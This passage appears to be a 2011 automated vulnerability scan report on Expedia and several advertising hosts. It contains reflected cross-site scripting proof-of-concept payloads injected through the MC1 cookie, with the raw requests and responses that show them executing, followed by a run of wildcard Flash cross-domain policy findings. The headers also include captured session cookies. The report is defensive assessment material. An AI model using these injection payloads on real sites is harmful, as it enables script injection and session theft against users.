User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B3e0a7"%3balert(1)//dcdeca00260; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; cp_session=UylSJgVxACRUPAJyAGoEaQRCDBEAA1FsA3EJOlZ2AngBcwR4ACYFPAF7WS1QIlIhACADPQd2VW4AJgM5ASBUdARyXyIBMAUSBHEIMwZEBCJTYFJCBXUAcVRxAn4ANgR9BHAMOwAxUWwDZAl%2FVjcCOwE8BCgANgVAAXBZelA1UnEAYAMXBzVVMwBhAz8BIFQuBGZfawFvBXYEZwhHBnMEdFMxUnYFJwA1VEICNgA%2FBGAEeAx7AGdRMwN2CSRWNgI5AXQEPgBABTcBJVk9UGFSNwA7AyUHLVVxADcDFQEVVFUEUV8iATEFZQQ3CGgGdgRjU3dSNwVGAEJUUgIHAHYENwQ2DDoANFFxA2AJYFZxAmcBFQQoADYFMAFtWWFQI1I8AHcDYgcQVWEAIQNjARJUMQQnXzUBRQVhBGQIMAYzBCJTYFIyBXAAYVR1AiQAdgQ2BEQMbwBwUTcDMwkjVjMCMQE1BCgANwVCATFZP1ByUmYAZAM3ByxVJwBwA3QBZ1REBDJfIgExBWUEOAhuBmMEY1N3UjcFRgA3VCMCYgBlBGYEQQw6ACBRIAM2CRVWZQJxAWMEOwB2BWABcll9UHJSZwAWA3wHYFVmAD0DdAFnVEYEIF96AS8FcQQxCCMGOAQlUw5SKwVxAGNUdQIjADoEagRuDAIAelFJAzYJH1YkAg4BEgQ1ADEFZAFFWUVQB1ICAD8DPQdkVTUAcwNsAWlUIgR%2F; supportsurvey=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%2526function%2520%2528%2529%257Bvar%2520a%253D%255B%2522%257B%2522%255D%252Cb%252Ck%252Cv%253Bfunction%2520p%2528s%2529%257Bif%2528b%2529%257Ba.push%2528%2522%252C%2522%2529%253B%257D%250Aa.push%2528k.toJSONString%2528%2529%252C%2522%253A%2522%252Cs%2529%253Bb%253Dtrue%253B%257D%250Afor%2528k%2520in%2520this%2529%257Bif%2528this.hasOwnProperty%2528k%2529%2529%257Bv%253Dthis%255Bk%255D%253Bswitch%2528typeof%2520v%2529%257Bcase%2522object%2522%253Aif%2528v%2529%257Bif%2528typeof%2520v.toJSONString%253D%253D%253D%2522function%2522%2529%257Bp%2528v.toJSONString%2528%2529%2529%253B%257D%257Delse%257Bp%2528%2522null%2522%2529%253B%257D%250Abreak%253Bcase%2522string%2522%253Acase%2522number%2522%253Acase%2522boolean%2522%253Ap%2528v.toJSONString%2528%2529%2529%253B%257D%257D%257D%250Aa.push%2528%2522%257D%2522%2529%253Breturn%2520a.join%2528%2522%2522%2529%253B%257D%253DtoJSONString%3B

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:42:29 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=Vy0FcVYiAiZVPQNzUjgDblMVUE1XVFVoBHZcbwQkUSsFdwV5UXcEPQN5BXFWJAZ1U3NSbFQlBT4EIlBqVndQcFYgDnMNPAIVAncAOwBCAiRXZAUVViYCc1VwA39SZAN6UydQZ1dmVWgEY1wqBGVRaAU4BSlRZwRBA3IFJlYzBiVTM1JGVGYFYwRlUGxWd1AqVjQOOg1jAnECYQBPAHUCclc1BSFWdAI3VUMDN1JtA2dTL1AnVzBVNwRxXHEEZFFqBXAFP1ERBDYDJwVhVmcGY1NoUnRUfgUhBDNQRlZCUFFWAw5zDT0CYgIxAGAAcAJlV3MFYFYVAkBVUwMGUiQDMFNhUGZXY1V1BGdcNQQjUTQFEQUpUWcEMQNvBT1WJQZoUyRSM1RDBTEEJVAwVkVQNVZ1DmQNSQJmAmIAOAA1AiRXZAVlViMCY1V0AyVSJAMxUxNQM1cnVTMENFx2BGFRYgUxBSlRZgRDAzMFY1Z0BjJTN1JmVH8FdwR0UCdWMFBAVmAOcw09AmICPgBmAGUCZVdzBWBWFQI1VSIDY1I3A2FTFlBmV3dVJAQxXEAEN1EiBWcFOlEnBGEDcAUhVnQGM1NFUi1UMwU2BDlQJ1YwUEJWcg4rDSMCdgI3ACsAPgIjVwoFfFYiAmFVdAMiUmgDbVM5UF5XLVVNBDFcSgR2UV0FFgU0UWAEZQNHBRlWAQZWU2xSbFQ3BWUEd1A%2FVj5QJlYt; path=/
RNT-Time: D=341324 t=1304721749948953
RNT-Machine: 08
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95330


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
upport:Search Results";
var s_pageNameOrig = s_pageName;
s_server = "www.support.expedia.com";
s_channel = "FAQ Support";
s_prop1 = "";
s_prop11 = "";
s_prop12 = "80312807C795402E93C5016D2A2A3E1B3e0a7";alert(1)//dcdeca00260";
s_account = "expedia1";
s_exp_account = s_account;
s_pageType = "";
s_hier1 = "HTX," + s_channel;
s_purchaseID = "";
s_products = "";
s_events = "";
s_currencyCode="";
s_eVar17= "FAQ Support
...[SNIP]...
5.110. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F [MC1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.expedia.com
Path:   /app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

Issue detail

The value of the MC1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2c96"%3balert(1)//1715fb887f2 was submitted in the MC1 cookie. This input was echoed as c2c96";alert(1)//1715fb887f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1Bc2c96"%3balert(1)//1715fb887f2; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_FLTFLEX_CALENDAR%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/daily/service/default.asp%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:42:02 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=BX9TJwx4AycAaFAgUUgBRVMTBDBTUVxhVCYLOFBwA3lVJwR4AiQNNFAqAnZSIFYlUnJTbQNyAzhQdldtXH0BIVYgDHENPAIVBnMGPVETUnQFNlNDDHwDcgAlUCxRZwF4UycEM1NiXGFUMwt9UDEDOlVoBCgCNA1IUCECIVI3VnVSMlNHAzEDZVAxV2tcfQF7VjQMOA1jAnEGZQZJUSRSIgVnU3cMLgM2ABZQZFFuAWVTLwRzUzRcPlQhCyZQMAM4VSAEPgJCDT9QdAJmUmNWM1JpU3UDKQMnUGdXQVxIAQBWAwxxDT0CYgY1BmZRIVI1BSFTNgxPA0EABlBVUScBMlNhBDJTZ1x8VDcLYlB3A2ZVQQQoAjQNOFA8AjpSIVY4UiVTMgMUAzdQcVc3XE8BZFZ1DGYNSQJmBmYGPlFkUnQFNlMzDHkDYgAhUHZRJwEzUxMEZ1MjXDpUZAshUDUDMFVhBCgCNQ1KUGACZFJwVmJSNlNnAygDcVAgVyBcOgERVmAMcQ09AmIGOgZgUTRSNQUhUzYMTwM0AHdQMFE0AWNTFgQyU3NcLVRhCxdQYwNwVTcEOwJ0DWhQIwImUnBWY1JEUywDZAMwUG1XIFw6ARNWcgwpDSMCdgYzBi1Rb1JzBVhTKgx4A2AAIVBxUWsBb1M5BApTKVxEVGELHVAiAw9VRgQ0Ak0NXFAEAgZSOFYGUjJTbQNgA2NQI1c4XDQBd1Yt; path=/
Set-Cookie: supportsurvey=1; expires=Fri, 13-May-2011 22:42:03 GMT; path=/; domain=support.expedia.com
RNT-Time: D=486064 t=1304721722848302
RNT-Machine: 04
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
= "FAQ Support:Launch";
var s_pageNameOrig = s_pageName;
s_server = "www.support.expedia.com";
s_channel = "FAQ Support";
s_prop1 = "";
s_prop11 = "";
s_prop12 = "80312807C795402E93C5016D2A2A3E1Bc2c96";alert(1)//1715fb887f2";
s_account = "expedia1";
s_exp_account = s_account;
s_pageType = "";
s_hier1 = "HTX," + s_channel;
s_purchaseID = "";
s_products = "";
s_events = "";
s_currencyCode="";
s_eVar17= "FAQ Support
...[SNIP]...
5.111. http://www.expedia.com/default.asp [MC1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /default.asp

Issue detail

The value of the MC1 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b6b0"><script>alert(1)</script>d8dba5a2447 was submitted in the MC1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /default.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=9b6b0"><script>alert(1)</script>d8dba5a2447; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 68427
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private
Date: Fri, 06 May 2011 22:34:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 68427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<COMMENT TITLE="MO
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=9b6b0"><script>alert(1)</script>d8dba5a2447;ord=2733880877494.81?" width="1" height="1" frameborder="0" style="position:absolute;">
...[SNIP]...
6. Flash cross-domain policy  previous  next
There are 56 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://a.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Sat, 07 May 2011 01:50:39 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Sat, 04-Jun-2011 01:50:39 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>
6.2. http://a.rad.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT
Accept-Ranges: bytes
ETag: "0d09952f3facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 20:28:07 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
6.3. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Fri, 06 May 2011 21:50:02 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
6.4. http://adsfac.us/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "0291dc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 07 May 2011 01:50:17 GMT
Connection: close
Content-Length: 125

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>

6.5. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Fri, 06 May 2011 21:50:13 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
6.6. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sun, 05 Jun 2011 21:06:48 GMT
X-FB-Server: 10.32.16.127
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...
6.7. http://apps.sapha.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.sapha.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 13 Jun 2009 07:57:06 GMT
ETag: "d30807e-140-2bd11880"
Accept-Ranges: bytes
Content-Length: 320
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
6.8. http://as.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:23:31 GMT
ETag: "17b0daf-e6-41faec0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Fri, 06 May 2011 20:28:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 06 May 2011 20:28:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
6.9. http://b.rad.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT
Accept-Ranges: bytes
ETag: "0d09952f3facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 20:28:07 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
6.10. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Fri, 06 May 2011 22:33:36 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
6.11. http://c.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 06 May 2011 19:29:07 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
6.12. http://cdn-cms.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn-cms.scout.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Location: http://cdn-cms.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
ETag: "01f3482dc3fcb1:67b"
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:29:03 GMT
Content-Length: 222
Connection: close
Akamai: True

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...
6.13. http://cdn.eyewonder.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "b2ae8e693141c91:139e"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
